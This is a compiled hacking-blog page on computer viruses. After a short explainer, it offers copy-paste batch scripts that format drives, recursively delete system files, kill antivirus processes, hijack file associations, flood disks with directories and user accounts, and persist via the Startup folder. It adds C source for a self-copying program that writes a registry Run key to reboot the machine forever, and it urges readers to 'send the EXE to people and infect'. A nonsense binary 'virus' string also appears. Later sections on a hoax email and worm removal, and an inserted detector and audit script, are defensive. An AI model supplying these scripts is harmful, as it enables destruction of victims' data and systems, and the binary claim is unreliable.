
A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the owner. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.

Viruses

A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.

E-Mail Viruses

An e-mail virus can be a form of macro virus that spreads itself to all the contacts in the host's e-mail address book. If any of the recipients opens the attachment of the infected mail, it spreads to the new host's address book contacts and then sends itself to all those contacts as well. These days, e-mail viruses can infect a host even if the infected e-mail is only previewed in a mail client. One of the most common and destructive e-mail viruses is the ILOVEYOU virus.

Boot Sector Viruses


A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating systems to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence.

A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading.

Though boot viruses still exist, they are rare compared to new age malicious software. Another reason why they're not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive.

Worms

A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.

How to protect yourself from these viruses

You can protect yourself against viruses with a few simple steps:

* If you are truly worried about traditional (as opposed to e-mail) viruses, you should be running a more secure operating system like UNIX. You never hear about viruses on these operating systems because the security features keep viruses (and unwanted human visitors) away from your hard disk.

* If you are using an unsecured operating system, then buying virus protection software is a nice safeguard.

* If you simply avoid programs from unknown sources (like the Internet), and instead stick with commercial software purchased on CDs, you eliminate almost all of the risk from traditional viruses. In addition, you should disable floppy disk booting -- most computers now allow you to do this, and that will eliminate the risk of a boot sector virus coming in from a floppy disk accidentally left in the drive.

* You should make sure that Macro Virus Protection is enabled in all Microsoft applications, and you should NEVER run macros in a document unless you know what they do. There is seldom a good reason to add macros to a document, so avoiding all macros is a great policy.



If you think that Notepad is useless then you are wrong, because you can do a lot of things with Notepad which you could never have imagined. In this hack I will show you how to make a simple .bat file (virus) that can't be detected by any antivirus.

Here are some good viruses. I am not responsible for any kind of damage to your system ... :)

  • Copy this to notepad and save as flood1.bat.....

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

What it does: this is an extremely harmful virus that will keep replicating itself until your hard drive is totally full and will destroy your computer.


  • A simple binary code that can format the system drive, secondary drives...


1) Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000

2) Save As An EXE Any Name Will Do

3)Send the EXE to People And Infect

  • Some other interesting formatting codes....
1) format c:\ /Q/X — this will format your drive c:\


2) format d:\ /Q/X — this will format your drive d:\


3) format a:\ /Q/X — this will format your drive a:\


4) del /F/S/Q c:\boot.ini — this will cause your computer not to boot.


  • Some more interesting stuff ..

open notepad


erase c:\windows


and save as

FINDOUTANAME.cmd


What it does: it will erase c:/windows ......Lol


  • Here is another one which is funny......


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."


  • This code opens multiple windows, meaning infinite windows, until you restart the computer. Write the code in Notepad and save it as denger.bat:

@echo off
copy 0% denger.bat
start denger.bat

  • This code about the computer shutdown:

@echo off
shutdown -s -t 5 -c "Shutdown"


  • Go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat


  • Want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


  • Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will disappear)
3. End Process, zonelabs.exe
4. Associate an exe file with txt (when opening exe files, it will go to Notepad)
5. Associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Delete Login/Logoff Screens

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

  • One more ...

Try this one:

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

Then it is complete. Save it as any file you want in .bat format and enjoy, lol. It's really dangerous; don't try it on your own PC.

  • How to add your own viruses to the startup programs; this makes them difficult to detect and to remove ...

1) For this you can use the simple code below ..

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

and then the rest of the code ..

2) Suppose you want to make shutdown.bat a virus that copies itself into the startup programs and, whenever the computer starts, shuts it down in 2 seconds. This is the most dangerous kind of thing; it is better to create a restore point before working with such files.

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

@echo off
shutdown -s -t 5 -c "Shutdown"

Save it as abcd.bat. Whenever you run it, it will be saved in your startup programs.

Here, t 5 means that your computer will take 5 seconds to shut down. You can make it 2 as well; then it will be the most dangerous thing to handle .. lol

For more on virus making refer this links

Do not try it on your PC. Don’t mess around this is for educational purpose only
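From the defender's side, the behaviours used by the scripts in this post are easy to spot statically. The following is an added Python example, not part of the original post: it flags those behaviours in a batch file, reconstructs scripts that are written out with `echo ... >> file.bat`, and ignores commands that are merely echoed to the screen. The tag names, patterns and the sample script (assembled from lines shown above) are constructed for illustration.

```python
import re

# Triage heuristics for the behaviours the scripts in this post rely on.
# Tags and patterns are choices made for this example, not antivirus signatures.
RULES = [
    ("recursive-delete", re.compile(r"^(del|erase)\b(?=.*/s)(?=.*/q)", re.I)),
    ("recursive-rmdir", re.compile(r"^(rd|rmdir)\b(?=.*/s)", re.I)),
    ("format-drive", re.compile(r"^format\s+[a-z]:", re.I)),
    ("shutdown-or-reboot", re.compile(r"^shutdown\b.*[-/][sr]\b", re.I)),
    ("startup-persistence",
     re.compile(r"^(copy|xcopy|move)\b.*\\Programs\\Startup", re.I)),
    ("assoc-hijack", re.compile(r"^assoc\s+\.\w+=", re.I)),
    ("account-creation", re.compile(r"^net\s+user\b.*/add\b", re.I)),
]
# "echo <payload> >> file.bat": the script writes a second script to disk.
DROPPER = re.compile(
    r'^echo\s+(?P<payload>.*?)\s*>{1,2}\s*"?(?P<file>[^">]+?\.(?:bat|cmd|vbs))"?\s*$',
    re.I)
LABEL = re.compile(r":([A-Za-z_]\w*)")
GOTO = re.compile(r"goto\s+:?(\w+)", re.I)


def normalize(line):
    """Strip whitespace and the leading '@' that only suppresses echoing."""
    return line.strip().lstrip("@").strip()


def unbounded_loops(commands):
    """Find backward GOTOs whose loop body has no IF or EXIT to end it."""
    labels, found = {}, []
    for idx, (no, cmd) in enumerate(commands):
        label, jump = LABEL.match(cmd), GOTO.match(cmd)
        if label:
            labels[label.group(1).lower()] = idx
        elif jump and jump.group(1).lower() in labels:
            body = [c for _, c in commands[labels[jump.group(1).lower()] + 1:idx]]
            if body and not any(re.match(r"(if|exit)\b", c, re.I) for c in body):
                found.append((no, "unbounded-loop", "; ".join(body)))
    return found


def triage(script_text):
    """Return sorted (line_no, tag, detail) findings for one batch script."""
    findings, commands, dropped = [], [], {}
    for no, raw in enumerate(script_text.splitlines(), 1):
        cmd = normalize(raw)
        if not cmd or cmd.lower().startswith(("rem ", "::")):
            continue
        commands.append((no, cmd))
        drop = DROPPER.match(cmd)
        if drop:
            # Collect the payload per target file; '%%' is an escaped '%'.
            first_no, lines = dropped.setdefault(drop.group("file"), (no, []))
            lines.append(drop.group("payload").replace("%%", "%"))
            continue
        if re.match(r"echo\b", cmd, re.I):
            continue  # plain ECHO only prints text; "echo del *.*" deletes nothing
        findings += [(no, tag, cmd) for tag, rx in RULES if rx.search(cmd)]
    findings += unbounded_loops(commands)
    for name, (first_no, lines) in dropped.items():
        findings.append((first_no, "script-dropper", name))
        # Analyse the reconstructed script the same way as the parent.
        for _, tag, detail in triage("\n".join(lines)):
            findings.append((first_no, "dropped:" + tag, f"{name}: {detail}"))
    return sorted(findings)


# Constructed sample made of lines that appear in the scripts above.
SAMPLE = r"""@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
echo Deleting Critical System Files...
echo del *.*
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
shutdown -s -t 5 -c "Shutdown"
"""

if __name__ == "__main__":
    for line_no, tag, detail in triage(SAMPLE):
        print(f"line {line_no:>2}  {tag:<24} {detail}")
```

The echoed `del *.*` on line 4 of the sample produces no finding, while the loop written into bat5.bat is reported even though it never appears as a command in the parent script.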






Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing: none of the antivirus programs detects this as a virus since I have coded this virus in C. So if you are familiar with the C language then it's easy to understand the logic behind the code.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],"rb"); //The virus file open's itself
switch(drive_no)
{
case 1:
target=fopen("C:\\windows\\system\\sysres.exe","wb"); //to place a copy of itself in a remote place
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup
break;

case 2:
target=fopen("D:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe");
break;

case 3:
target=fopen("E:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe");
break;

case 4:
target=fopen("F:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe");
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system("shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From then on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in SAFE MODE.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file named sysres.exe; delete it.
4. Type regedit in Run to open the registry editor. Navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry named "sres". Delete this entry. That's it. You have removed this virus successfully.

The trick may be Risky so be careful while you use this trick on your own personal computer.




Strange but true, there are times when we decide to get rid of some virus or a worm by reformatting the system but even after formatting the PC we are shocked to see the virus back in our computers. This is what happened to my friend who formatted the PC just to get it cleaned but the problem was still there.

I must confess that there is no better way to protect our PC from viruses than preventing the virus from entering the system, but there are viruses (rare but still there) that do not get removed even if we format our disk. It may also interest you to know that these viruses may also infect the BIOS and/or the boot sector. So if you feel that your BIOS is infected, then reflashing it is the only option available.

So these are the steps that you can do to ensure the removal of virus after format:

1. If you are just formatting the PC to delete the viruses then make sure to format the complete system and not a single suspected drive as most viruses come back from other drives.

2. While formatting the system through the Windows CD, perform "delete all partitions" to clear all data that contained the worm.

3. If this format still doesn't work (I don't think it would happen) then you should perform a Low Level Format on the disk that will surely erase everything stored on it.

Any of the methods listed will surely solve your problem.





Hi all, see this, read this and enjoy

Hello friends first of all i want to let u know that this is just a hoax. So nothing to worry about.

This hoax started circulating in early 2002 and it has been passed around ever since. In spite of a great deal of online exposure, the hoax tends to resurge from time to time and its rate of circulation increases dramatically for a few months. As hoax emails go, this is one of the most "successful". Perhaps because of the apparent destructiveness of the "virus" and the urgent tone of the warning, people are apt to forward the message without much forethought. Like many other hoaxes, it capitalizes on the recipient's desire to help other Internet users by warning them of a perceived threat.

Symantec clarification about this Hoax

Discovered: January 15, 2002
Updated: February 13, 2007 11:59:14 AM
Type: Hoax

This hoax was first circulated in Portuguese. English, French, Italian and German versions have also been recorded.

English
URGENT! VIRUS!

This information arrived this morning, from Microsoft and Norton. Please send it to everybody you know who accesses the Internet.
You may receive an apparently harmless email with a PowerPoint presentation called "Life is beautiful.pps."
If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately.
If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful", subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, email and password.
This is a new virus which started to circulate on Saturday afternoon. WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS.
UOL has already confirmed its dangerousness, and the antivirus Softs are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner", and who aims to destroying domestic PCs and who also fights Microsoft in court!
That’s why it comes disguised with extension pps. He fights in court for the Windows-XP patent.

MAKE A COPY OF THIS EMAIL TO ALL YOUR FRIENDS.

Chinese
This is an illustration of the Chinese version



French
WARNING !!!
There is a new virus on the network. The information comes from Microsoft and Norton. Please pass it on to all your contacts. You may receive an e-mail with a PowerPoint presentation titled "La vie est belle.pps" or "Life is beautiful.pps". If you receive it, DO NOT OPEN IT!! DELETE IT AS QUICKLY AS POSSIBLE. If you open it, a message will appear on your screen: "now it is late, your life is no longer beautiful". YOU WILL IMMEDIATELY LOSE EVERYTHING YOU HAVE ON YOUR COMPUTER and the person who sent you this e-mail will have access to your name, e-mail and password. This is a new virus that began circulating on Saturday afternoon. WE MUST DO WHAT WE CAN TO STOP IT. AOL has already confirmed how dangerous it is, and antivirus programs are not able to destroy it. The virus was created by a hacker who claims to be the master of the world and wants to destroy home PCs. He is in a lawsuit against Microsoft over the Windows XP licence.

SEND THIS E-MAIL TO ALL YOUR CONTACTS
Thank you

German
Virus warning

The information comes from Microsoft and Norton. Please forward it to all your contacts. You could receive an e-mail with a PowerPoint presentation titled "La vita è bella.pps" or "Life is beautiful.pps".

If you get it - DO NOT OPEN IT! DELETE IT IMMEDIATELY!! If you open it anyway, the message "Adesso è tardi, la vostra vita non è più bella" or "Now it's too late, your life is not beautiful anymore" appears.

You immediately lose the entire contents of the PC and the sender has access to your address, e-mail and password. This is a new virus that has been in circulation since Saturday afternoon. We must do what is possible to stop this virus. AOL has already confirmed how dangerous it is, and antivirus software is not yet able to destroy it.

The virus was programmed by a hacker who calls himself "Lord of Life" (though this need not be the sender) and who has set out to destroy all PCs. Allegedly this psychopath is in a legal dispute with Microsoft over the patent for Windows XP.


Italian
WARNING!!!
There is A NEW VIRUS on the network. The info comes from Microsoft and Norton. Please pass it on to all your contacts. You may receive an e-mail with a PowerPoint presentation titled "La vita è bella, pps" or "Life is beautiful, pps". If you receive it, DO NOT OPEN IT!!!! DELETE IT AS SOON AS POSSIBLE!!!
If you open it, a message will appear on your monitor: "Now it is late, your life is no longer beautiful". YOU WILL IMMEDIATELY LOSE EVERYTHING YOU HAVE ON YOUR PC and the person who sent it to you will have access to your name, e-mail and password. This is a new virus that began circulating on Saturday afternoon.
WE MUST DO WHAT WE CAN TO STOP THAT VIRUS.
AOL has already confirmed how dangerous it is, and antivirus software is not able to destroy it. The virus was created by a hacker who styles himself the owner of life and aims to destroy home PCs. He is in a legal fight against Microsoft over the Windows XP patent.

SEND THIS E-MAIL TO ALL YOUR CONTACTS !!!!!


Portuguese:

URGENT! VIRUS!

This information came from Microsoft and Norton this morning. Please pass it on to anyone you know who accesses the Internet.
You may receive an e-mail with an apparently harmless PowerPoint presentation titled "A Vida é bela.pps". If you receive it, DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES and delete it immediately.
If you open this file, the message "Now it is late, your life is no longer beautiful" will appear on your monitor; you will then LOSE EVERYTHING YOU HAVE ON YOUR PC and the person who sent it will have access to your name, e-mail and password. This is a new virus that began circulating on Saturday afternoon.
WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS.
UOL has already confirmed how dangerous it is, and antivirus software is not able to destroy it. The virus was created by a hacker who calls himself the owner of life and intends to destroy home PCs, and who is fighting Microsoft in court! That is why it comes disguised with the pps extension. He is fighting in court over the Windows-XP patent

COPY THIS E-MAIL TO ALL YOUR FRIENDS

Spanish

ULTRA-DANGEROUS VIRUS - .PPS FORMAT -

WARNING!!!

There is a new virus in the area!!!! The information comes from Microsoft and Norton. Please pass it on to anyone with Internet access..

You may receive an e-mail with an apparently harmless PowerPoint presentation titled "La vida es bella.pps"
If you receive it, DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES and delete it immediately. If you open this file, a message will appear on your monitor: "Now it is late, your life is no longer beautiful"; you will then LOSE EVERYTHING YOU HAVE ON YOUR PC and the person who sent it will have access to your name, e-mail and password. This is a new virus that began circulating on Saturday afternoon.
WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS. UOL has already confirmed how dangerous it is, and antivirus software is not able to destroy it.

COPY THIS E-MAIL TO ALL YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO YOUR FRIENDS, YOU BENEFIT US ALL.

Please ignore any messages regarding this hoax and do not pass on messages. Passing on messages about the hoax only serves to further propagate it.
Writeup By: George Koris


Older versions of the hoax:
This information arrived this morning, from Microsoft and Norton. Please send it to everybody you know who accesses the Internet. You may receive an apparently harmless email with a PowerPoint presentation called "Life is beautiful.pps."

If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately. If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful", subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, email and password. This is a new virus which started to circulate on Saturday afternoon. WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS. UOL has already confirmed its dangerousness, and the antivirus Softs are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner", and who aims to destroying domestic PCs and who also fights Microsoft in court! That's why it comes disguised with extension pps. He fights in court for the Windows- XP patent.

MAKE A COPY OF THIS EMAIL TO ALL YOUR FRIENDS

VERY IMPORTANT WARNING

Please Be Extremely Careful especially if using internet mail such as Yahoo, Hotmail, AOL and so on. This information arrived this morning direct from both Microsoft and Norton. Please send it to everybody you know who has access to the Internet.

You may receive an apparently harmless email with a Power Point presentation "Life is beautiful."

If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately. If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful." Subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, e-mail and password. This is a new virus which started to circulate on Saturday afternoon. AOL has already confirmed the severity, and the antivirus software's are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner."

PLEASE SEND A COPY OF THIS EMAIL TO ALL YOUR FRIENDS and ask them to PASS IT ON IMMEDIATELY.

Commentary:
This "warning" claims that a very destructive virus disguised as a Power Point Presentation called "Life is beautiful" is currently being distributed via email. However, there is not, nor has there ever been a virus like the one described in this message.

There are several variants of the hoax, including versions in Chinese, French, Spanish, Italian and several other languages. The message tries to add authority to its claims by mentioning high-profile companies such as Microsoft and AOL. Incidentally, Microsoft does not send out unsolicited virus warnings. Moreover, "Norton" is the name given to a range of security software products sold by Symantec Corp. Thus, information about virus threats is published by "Symantec", not "Norton". In this case, Symantec has published information about the "Life is beautiful" message - but only to denounce it as a hoax.



Regsvr.exe:

Regsvr.exe is identified as a worm that was first detected around 2007-08. It is usually detected along with Newfolder.exe and, like Newfolder.exe, spreads with the help of pen drives. When a flash drive is inserted into an infected system, regsvr.exe immediately creates a copy of itself on the USB drive, together with an autorun.inf file that lets it launch on the target's system. The worm is capable of editing the registry and auto-executing itself at system startup. It generally resides in the Windows\system32 directory. It can be removed by scanning the pen drive with a good antivirus or simply by opening the USB drive from the Windows Command Prompt. Using a good firewall is recommended to prevent viruses like this one. Here is a simple manual removal method for this virus.

  • The worm launches processes with the names Newfolder.exe, server.exe and AT1.exe. Make sure that you kill these processes first.
  • Now go to Control Panel -> Scheduled Tasks, and delete the task that launches this process.
  • Go to the Windows\system32 folder and delete the file from there.
  • You are almost done. Now go to Start -> Run, type regedit and go to the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

  • Edit the Shell value, which reads "Explorer.exe regsvr.exe", and delete regsvr.exe from it so that only Explorer.exe remains.
  • Now you are free from the virus.
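
Before deleting anything by hand, it helps to see which of the locations from the steps above are actually affected. The following read-only PowerShell audit is an added example, not part of the original post; the function name is hypothetical, the process and file names are the ones the steps mention, and it assumes Windows 8 / Server 2012 or later for `Get-ScheduledTask`.

```powershell
# Added example: read-only audit of the locations named in the removal steps.
# Names come from the page; matches are leads to review, nothing is changed.
$suspects = 'regsvr', 'Newfolder', 'server', 'AT1'   # process names without .exe
$pattern  = '(^|[\\/\s"])(regsvr|newfolder|server|at1)\.exe'

function Get-RegsvrWormFindings {
    # 1. Running processes (Get-Process matches exact names, so regsvr32 is not hit)
    Get-Process -Name $suspects -ErrorAction SilentlyContinue | ForEach-Object {
        "Process: $($_.Name).exe (PID $($_.Id)) $($_.Path)"
    }

    # 2. Scheduled tasks whose action launches one of the names
    #    (assumes the ScheduledTasks module, Windows 8 / Server 2012 or later)
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            if ($action.Execute -match $pattern) {
                "Task: $($task.TaskPath)$($task.TaskName) -> $($action.Execute)"
            }
        }
    }

    # 3. The dropped copy in system32
    $dropped = Join-Path $env:SystemRoot 'System32\regsvr.exe'
    if ([System.IO.File]::Exists($dropped)) { "File: $dropped" }

    # 4. Winlogon Shell should be exactly explorer.exe
    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $shell = (Get-ItemProperty -Path $key -Name Shell -ErrorAction SilentlyContinue).Shell
    if ($shell -and $shell.Trim() -ne 'explorer.exe') { "Winlogon Shell: '$shell'" }

    # 5. autorun.inf launch entries on removable drives (DriveType 2)
    foreach ($disk in (Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2')) {
        $inf = "$($disk.DeviceID)\autorun.inf"
        if ([System.IO.File]::Exists($inf)) {
            [System.IO.File]::ReadAllLines($inf) |
                Where-Object { $_ -match '^\s*(open|shellexecute|shell\\.+\\command)\s*=' } |
                ForEach-Object { "Autorun ($inf): $($_.Trim())" }
        }
    }
}

$findings = @(Get-RegsvrWormFindings)
if ($findings.Count) { $findings } else { 'No indicators from the removal steps were found.' }
```

A generic name such as server.exe can belong to legitimate software, so confirm the file's location before treating a hit as the worm.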



What's Microsoft's response to this?

SOURCE: [url down]


The World's Most Dangerous Virus

Date Published: Oct 21, 2003

Imagine if a computer virus emerged that secretly
attached itself to one of the most popular software
programs ever. Imagine if the largest media outlets
unwittingly praised this secret pairing, encouraging
millions of people to install it. Imagine if none of the
major antivirus programs would detect it. Imagine if once
installed, it could alter anything on your computer
without your consent or knowledge. Imagine if the virus
was at the control of a greedy entity that has repeatedly
trampled on consumers and smaller companies to advance
its corporate agenda. Imagine if it could force everyone
who wanted to communicate with you to also carry the
virus so it would insidiously spread person to person.
Sound like a scary sci-fi plot? It's not science fiction.
This week MO3 will be released on the world. Here's how
to detect it in your neighborhood and what you can do to
protect yourself:

The Trojan Horse

Press outlets will blanket the world with stories about
Microsoft Office 2003. Most articles will tout seemingly
innocuous features and feel good quotes from Microsoft
like "this is our most important product release ever."
Unfortunately the press won't talk about the dangerous
software buried inside this release - MO3. This code will
give Microsoft the ability to change anything on your
computer at anytime they wish with no notification to
you.

The Security Ploy

Post 9/11, few people question actions taken under the
guise of "improved security" and this is how MO3 will be
foisted onto computer users - as a feature to 'make you
safer.' Computer users have understandably tired of the
near daily worm and virus warnings, as well as the time-
consuming patch process due to Microsoft's lax software
